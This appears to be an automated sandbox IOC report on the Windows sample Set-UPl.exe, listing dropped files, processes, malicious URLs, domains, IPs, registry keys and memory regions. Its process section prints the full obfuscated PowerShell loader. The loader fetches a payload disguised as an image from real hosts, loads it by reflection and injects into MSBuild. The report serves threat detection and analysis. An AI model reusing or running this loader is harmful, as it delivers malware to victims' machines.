IOC Report
Set-UPl.exe

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps108642010010Label

Files

File Path
Type
Category
Malicious
Download
Set-UPl.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\IXP000.TMP\6793fbe82c030.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1swiemy.gjq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gi5kpagl.hkm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4n1ydx1.sy2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnymlewc.x3h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmciu0e4.tc5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4eaxv0w.vy2.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Set-UPl.exe
"C:\Users\user\Desktop\Set-UPl.exe"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c 6793fbe82c030.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6793fbe82c030.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@Gs@YwBw@HI@YQBl@G0@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.kcpraem/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
carrystuppeder.net
malicious
flockefaccek.org
malicious
classyhelped.net
malicious
toppyneedus.biz
malicious
climepunneddus.com
malicious
https://guardeduppe.com/api
188.114.96.3
malicious
babberstalek.org
malicious
http://uptodatesystem.com
unknown
malicious
rebuildhurrte.com
malicious
guardeduppe.com
malicious
http://uptodatesystem.com/test/test.jpg
unknown
malicious
https://bbuseruploads.s3.amazonaws.com
unknown
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
unknown
https://guardeduppe.com:443/api
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website
unknown
https://guardeduppe.com/apim
unknown
https://guardeduppe.com/pi
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
unknown
https://aka.ms/pscore6
unknown
https://guardeduppe.com/
unknown
https://bbuseruploads.s3.amazonaws.com/a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/c8ee6340-249a-
unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
unknown
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
unknown
https://dz8aopenkvv6s.cloudfront.net
unknown
https://github.com/Pester/Pester
unknown
http://62.60.226.64/public_files/mearpck.txt
62.60.226.64
https://guardeduppe.com//
unknown
https://guardeduppe.com/apiG9
unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
unknown
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
unknown
https://cdn.cookielaw.org/
unknown
https://guardeduppe.com/wm
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
unknown
https://aui-cdn.atlassian.com/
unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
unknown
https://aka.ms/pscore68
unknown
https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113
185.166.143.48
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://bitbucket.org
unknown
https://guardeduppe.com/2U
unknown
There are 32 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
uptodatesystem.com
unknown
malicious
s3-w.us-east-1.amazonaws.com
52.217.234.17
bitbucket.org
185.166.143.48
bg.microsoft.map.fastly.net
199.232.210.172
s-part-0017.t-0009.fb-t-msedge.net
13.107.253.45
guardeduppe.com
188.114.96.3
bbuseruploads.s3.amazonaws.com
unknown
languageslearning.click
unknown
198.187.3.20.in-addr.arpa
unknown

IPs

IP
Domain
Country
Malicious
188.114.97.3
unknown
European Union
malicious
62.60.226.64
unknown
Iran (ISLAMIC Republic Of)
185.166.143.48
bitbucket.org
Germany
188.114.96.3
guardeduppe.com
European Union
52.217.234.17
s3-w.us-east-1.amazonaws.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
wextract_cleanup0
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
21F24A32000
trusted library allocation
page read and write
21F24A16000
trusted library allocation
page read and write
21F22B20000
trusted library allocation
page read and write
2906AE0F000
heap
page read and write
BD00AFE000
stack
page read and write
2906AE17000
heap
page read and write
27E4AF68000
trusted library allocation
page read and write
21F22911000
heap
page read and write
7FFD34940000
trusted library allocation
page read and write
9CAA343000
stack
page read and write
308F000
stack
page read and write
29EAA0D0000
heap
page read and write
2906C7F0000
heap
page read and write
BD014FB000
stack
page read and write
9F1000
heap
page read and write
A0F000
heap
page read and write
21F25474000
trusted library allocation
page read and write
27E4AF01000
trusted library allocation
page read and write
29EAA224000
heap
page read and write
29EAA244000
heap
page read and write
21F24330000
trusted library section
page read and write
29EAA200000
heap
page read and write
29EAA1B0000
heap
page read and write
2906ABD0000
heap
page read and write
21F228F5000
heap
page read and write
29EABEC0000
heap
page read and write
7FFD34890000
trusted library allocation
page read and write
27E49090000
heap
page read and write
2906AE0D000
heap
page read and write
27E4AB99000
trusted library allocation
page read and write
29EAA257000
heap
page read and write
A00000
heap
page read and write
C185DFE000
stack
page read and write
27E63160000
heap
page read and write
2906AE5D000
heap
page read and write
21F22B00000
trusted library allocation
page read and write
2906AE29000
heap
page read and write
27E4915C000
heap
page read and write
9CAA7FF000
stack
page read and write
7FFD34820000
trusted library allocation
page read and write
29EAA260000
heap
page read and write
9CAA9BE000
stack
page read and write
21F29074000
trusted library allocation
page read and write
29EAA260000
heap
page read and write
27E63120000
heap
page execute and read and write
2906CB41000
heap
page read and write
21F2A474000
trusted library allocation
page read and write
7FFD348D0000
trusted library allocation
page read and write
29EAA24F000
heap
page read and write
2906AE0E000
heap
page read and write
21F2293D000
heap
page read and write
7FFD348F0000
trusted library allocation
page read and write
27E62FD6000
heap
page read and write
21F228F9000
heap
page read and write
2906CB56000
heap
page read and write
96B000
heap
page read and write
21F228D7000
heap
page read and write
27E4B098000
trusted library allocation
page read and write
7FFD34930000
trusted library allocation
page read and write
2906CB41000
heap
page read and write
29EAA1D0000
heap
page read and write
2906AE34000
heap
page read and write
27E4AF10000
trusted library allocation
page read and write
27E49122000
heap
page read and write
DE5B4FF000
stack
page read and write
29EAA207000
heap
page read and write
7FFD34730000
trusted library allocation
page read and write
2906AE47000
heap
page read and write
9CAACBF000
stack
page read and write
27E491B6000
heap
page read and write
2906CB56000
heap
page read and write
DAE000
stack
page read and write
21F228BA000
heap
page read and write
27E62F80000
heap
page read and write
2906CB40000
heap
page read and write
27E4B096000
trusted library allocation
page read and write
27E4AC4D000
trusted library allocation
page read and write
27E491CC000
heap
page read and write
2906AE02000
heap
page read and write
BD010FD000
stack
page read and write
2906AE29000
heap
page read and write
29EAA260000
heap
page read and write
7FF6F4E7E000
unkown
page readonly
27E4B1F5000
trusted library allocation
page read and write
7FFD34960000
trusted library allocation
page read and write
21F24687000
trusted library allocation
page read and write
AC0000
heap
page read and write
27E4A9F0000
heap
page readonly
21F2C274000
trusted library allocation
page read and write
27E4AA10000
heap
page read and write
27E4AC67000
trusted library allocation
page read and write
2DEE000
stack
page read and write
3190000
trusted library allocation
page read and write
21F249E9000
trusted library allocation
page read and write
27E49113000
heap
page read and write
7FFD34850000
trusted library allocation
page execute and read and write
2906CB4F000
heap
page read and write
29EACBCF000
heap
page read and write
2906AD80000
heap
page read and write
2906ADAA000
heap
page read and write
29EAA227000
heap
page read and write
21F228EE000
heap
page read and write
BD00DFF000
stack
page read and write
21F24465000
heap
page read and write
C185F7E000
stack
page read and write
7FFD3483A000
trusted library allocation
page read and write
2906AE29000
heap
page read and write
27E490E4000
heap
page read and write
27E62FA5000
heap
page read and write
2906AE0F000
heap
page read and write
C185E7F000
stack
page read and write
7FF6F4E7C000
unkown
page read and write
7FFD34880000
trusted library allocation
page read and write
9EF000
heap
page read and write
A60000
heap
page read and write
29EAA260000
heap
page read and write
2906CB56000
heap
page read and write
2906ADFD000
heap
page read and write
27E493A0000
heap
page read and write
DE5B47E000
stack
page read and write
27E4AA00000
trusted library allocation
page read and write
93E000
stack
page read and write
459000
remote allocation
page execute and read and write
2906AE29000
heap
page read and write
27E490D0000
heap
page read and write
27E63127000
heap
page execute and read and write
21F2B874000
trusted library allocation
page read and write
2906ADEF000
heap
page read and write
27E49118000
heap
page read and write
27E4AA90000
heap
page read and write
2906AE01000
heap
page read and write
2F40000
heap
page read and write
27E49161000
heap
page read and write
2906AD6C000
heap
page read and write
27E6300B000
heap
page read and write
2906AE6F000
heap
page read and write
2906CB56000
heap
page read and write
27E4AC50000
trusted library allocation
page read and write
21F22B84000
heap
page read and write
27E5AB9C000
trusted library allocation
page read and write
2906ACD0000
heap
page read and write
2906CB4B000
heap
page read and write
27E5AB31000
trusted library allocation
page read and write
29EAA257000
heap
page read and write
27E4B061000
trusted library allocation
page read and write
2906AE0F000
heap
page read and write
29EAA244000
heap
page read and write
21F22B40000
trusted library allocation
page read and write
2906CB43000
heap
page read and write
7FFD34740000
trusted library allocation
page execute and read and write
27E6305D000
heap
page read and write
21F25E74000
trusted library allocation
page read and write
7FFD34736000
trusted library allocation
page read and write
2906ADBE000
heap
page read and write
21F243F0000
heap
page execute and read and write
7DF489C00000
trusted library allocation
page execute and read and write
7FFD348C0000
trusted library allocation
page read and write
27E4A9E0000
trusted library allocation
page read and write
7FF6F4E79000
unkown
page readonly
7FFD34970000
trusted library allocation
page read and write
7FFD34840000
trusted library allocation
page execute and read and write
29CD000
stack
page read and write
27E491C2000
heap
page read and write
27E4AC61000
trusted library allocation
page read and write
2906ADA9000
heap
page read and write
2906AE29000
heap
page read and write
29EAA263000
heap
page read and write
9CAB88C000
stack
page read and write
2906ADC5000
heap
page read and write
27E49134000
heap
page read and write
29EAA25A000
heap
page read and write
7FF6F4E7C000
unkown
page write copy
940000
heap
page read and write
9CAB80D000
stack
page read and write
27E49070000
heap
page read and write
21F22A80000
heap
page read and write
2906AE56000
heap
page read and write
9CAA87E000
stack
page read and write
21F24A07000
trusted library allocation
page read and write
27E63003000
heap
page read and write
29EAA246000
heap
page read and write
27E4AEFD000
trusted library allocation
page read and write
9ED000
heap
page read and write
7FF6F4E79000
unkown
page readonly
21F24A12000
trusted library allocation
page read and write
7FFD34910000
trusted library allocation
page read and write
2906AD60000
heap
page read and write
27E4AB31000
trusted library allocation
page read and write
2906AE29000
heap
page read and write
29EAA258000
heap
page read and write
27E4AB20000
heap
page execute and read and write
2906ADE6000
heap
page read and write
2906ADEB000
heap
page read and write
5A0000
heap
page read and write
29EAA25A000
heap
page read and write
29EAC8C0000
heap
page read and write
C185CFE000
stack
page read and write
9E3000
heap
page read and write
29EAA22C000
heap
page read and write
7FFD34683000
trusted library allocation
page execute and read and write
9CAA6FE000
stack
page read and write
31DE000
trusted library allocation
page read and write
21F24475000
heap
page read and write
27E63073000
heap
page read and write
2906ADF2000
heap
page read and write
C185C7E000
stack
page read and write
29EAA224000
heap
page read and write
27E4B050000
trusted library allocation
page read and write
3390000
heap
page read and write
29EAA25A000
heap
page read and write
27E4AF7D000
trusted library allocation
page read and write
21F26874000
trusted library allocation
page read and write
2906ADC5000
heap
page read and write
27E4AC9F000
trusted library allocation
page read and write
9CAAA37000
stack
page read and write
400000
remote allocation
page execute and read and write
27E4B1EA000
trusted library allocation
page read and write
A0B000
heap
page read and write
7FFD348B0000
trusted library allocation
page read and write
29EAA260000
heap
page read and write
2906AE47000
heap
page read and write
9CAA8FE000
stack
page read and write
2906ACB0000
heap
page read and write
BD007EA000
stack
page read and write
7FFD34980000
trusted library allocation
page read and write
9CAABBE000
stack
page read and write
27E4AB7B000
trusted library allocation
page read and write
9CAA3CD000
stack
page read and write
2906CB56000
heap
page read and write
27E490DC000
heap
page read and write
2906AE09000
heap
page read and write
9F5000
heap
page read and write
29EAA260000
heap
page read and write
2906ADEE000
heap
page read and write
ABD000
stack
page read and write
9CAB78E000
stack
page read and write
9CAAC3E000
stack
page read and write
7FFD34870000
trusted library allocation
page execute and read and write
27E62F85000
heap
page read and write
9CAA979000
stack
page read and write
27E4AA15000
heap
page read and write
29EAA220000
heap
page read and write
21F228B0000
heap
page read and write
21F2446A000
heap
page read and write
21F228F3000
heap
page read and write
21F27C74000
trusted library allocation
page read and write
997000
heap
page read and write
27E4AA17000
heap
page read and write
2F8E000
stack
page read and write
27E4ABCD000
trusted library allocation
page read and write
2EEF000
stack
page read and write
C18623E000
stack
page read and write
2906ADD1000
heap
page read and write
2906ADD9000
heap
page read and write
948000
heap
page read and write
30A6000
trusted library allocation
page read and write
2906AD65000
heap
page read and write
7FFD349A0000
trusted library allocation
page read and write
7FFD34682000
trusted library allocation
page read and write
9CAAAB9000
stack
page read and write
2D8D000
stack
page read and write
C18633E000
stack
page read and write
21F24601000
trusted library allocation
page read and write
2906ADE9000
heap
page read and write
7FFD348A0000
trusted library allocation
page read and write
27E5AB40000
trusted library allocation
page read and write
2ACD000
stack
page read and write
3128000
trusted library allocation
page read and write
27E63140000
heap
page read and write
2C8E000
stack
page read and write
21F22B80000
heap
page read and write
AD6000
heap
page read and write
7FFD34690000
trusted library allocation
page read and write
21F22938000
heap
page read and write
2906AE0F000
heap
page read and write
21F24828000
trusted library allocation
page read and write
27E63240000
heap
page execute and read and write
9CAADBB000
stack
page read and write
27E4B0A0000
trusted library allocation
page read and write
29EAA25A000
heap
page read and write
2906AE18000
heap
page read and write
2C3E000
stack
page read and write
2906AD68000
heap
page read and write
7FFD3473C000
trusted library allocation
page execute and read and write
BD012FE000
stack
page read and write
8FB000
stack
page read and write
21F249FE000
trusted library allocation
page read and write
298D000
stack
page read and write
21F29A74000
trusted library allocation
page read and write
27E48F90000
heap
page read and write
BD011FE000
stack
page read and write
27E4AF29000
trusted library allocation
page read and write
21F24440000
heap
page execute and read and write
309A000
trusted library allocation
page read and write
21F2AE74000
trusted library allocation
page read and write
21F228F1000
heap
page read and write
7FFD3468D000
trusted library allocation
page execute and read and write
C185973000
stack
page read and write
29EAC9CF000
heap
page read and write
95C000
heap
page read and write
DE5B1FE000
stack
page read and write
CAF000
stack
page read and write
30A2000
trusted library allocation
page read and write
27E4B045000
trusted library allocation
page read and write
27E4AC64000
trusted library allocation
page read and write
